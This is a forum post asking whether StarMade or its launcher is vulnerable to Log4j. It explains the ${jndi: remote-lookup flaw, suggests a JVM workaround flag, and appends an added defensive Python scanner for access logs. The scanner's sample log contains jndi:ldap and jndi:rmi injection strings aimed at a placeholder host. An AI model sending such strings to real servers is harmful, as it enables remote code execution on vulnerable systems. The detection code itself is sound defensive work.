Log4j vulnerability in StarMade or the StarMade Launcher current versions and older.

    Does StarMade, the Launcher or the bundled Java, in both current and older versions, have the Log4j vulnerability?


    A few days ago the Log4j vulnerability was found on Minecraft servers.

    A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
    It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (Firefox, Chrome, Edge...), when you made the request, what page you accessed... and more!
    So, this log4j library is used in A LOT of Java software, and there are approximately 3 billion devices that run Java. Quick math: that's huge.
    Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...

    A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything.
    One of the things it does is look for patterns like ${something} and try to replace them with another piece of information.
    It is used to add context, for example ${date} would be replaced by today's date.
    (I have no idea if this example works, it's just to keep it simple)
    So when there's a ${jndi: pattern, it will try to replace it.

    Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet; we just have to tell it where to get the data from.

    This data can be malicious software.

    Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j.
    Which means that at this point hackers can make the targeted computer do (almost) whatever they want.
    This gets really bad because we don't need to know which computer to target.
    Remember when I said the web server logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
    In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing it.

    GitHub page to the patched Log4j version.

    A workaround could be to add this JVM command to the tool: -Dlog4j2.formatMsgNoLookups=true

    But I do not know if this would work for StarMade if StarMade were found to have this issue.
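As an added example (not code from the original post or from StarMade), here is a defender-side scan of web server access logs for the pattern the post describes: a ${jndi: lookup arriving in a client-controlled field such as the User-Agent. Because lookup names match case-insensitively and can nest, it also flags any other ${...} syntax from a client as suspicious; the log lines, the placeholder host lookup.invalid and the function names are constructed for this example.

```python
import re
# Constructed sample access log (combined format); lookup.invalid is a reserved placeholder host.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"
203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.invalid/x}"
203.0.113.9 - - [12/Dec/2021:10:01:06 +0000] "GET /${JNDI:rmi://lookup.invalid/y} HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.11 - - [12/Dec/2021:10:02:00 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Dec/2021:10:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.invalid/z"
"""

# Combined log format: ip identd user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def extract_lookups(text):
    # Returns every ${...} span with nested braces kept balanced; an
    # unterminated "${" at the end of a field is returned as well.
    spans, i = [], 0
    while (start := text.find("${", i)) >= 0:
        depth, i = 0, start
        while i < len(text):
            if text.startswith("${", i):
                depth, i = depth + 1, i + 2
            elif text[i] == "}" and (depth := depth - 1) == 0:
                i += 1
                spans.append(text[start:i])
                break
            else:
                i += 1
        else:  # ran off the end of the field without closing the lookup
            spans.append(text[start:])
            break
    return spans

def classify(lookup):
    # Lookup names match case-insensitively and can nest, so any "${" sent by a
    # client is abnormal; a jndi lookup is the remote-load pattern the post describes.
    return "high" if "jndi" in lookup.lower() else "medium"

def scan_log(text):
    """Return (ip, field, lookup, severity) for each lookup in client-supplied fields."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:  # lines that are not in combined format are skipped
            for field in ("request", "referer", "agent"):
                for lk in extract_lookups(m.group(field)):
                    findings.append((m.group("ip"), field, lk, classify(lk)))
    return findings
```

Scanning inbound requests this way complements the JVM flag above: the flag only exists in Log4j 2.10 and later, and upgrading to the patched version remains the actual fix.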